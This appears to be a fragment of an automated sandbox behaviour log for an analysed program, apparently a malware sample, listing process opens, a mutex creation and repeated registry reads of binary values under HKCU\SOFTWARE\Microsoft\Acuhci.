1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
| Process | Open | desired_access = PROCESS_QUERY_INFORMATION |
|
1 | |
|
For performance reasons, the remaining 1657 entries are omitted.
The remaining entries can be found in glog.xml. |
|||||
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Mutex | Create | mutex_name = B3F6E53F120A5BE5825B9C06159BB3F4 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| System | Sleep | duration = -1 (infinite) |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY |
|
2 |
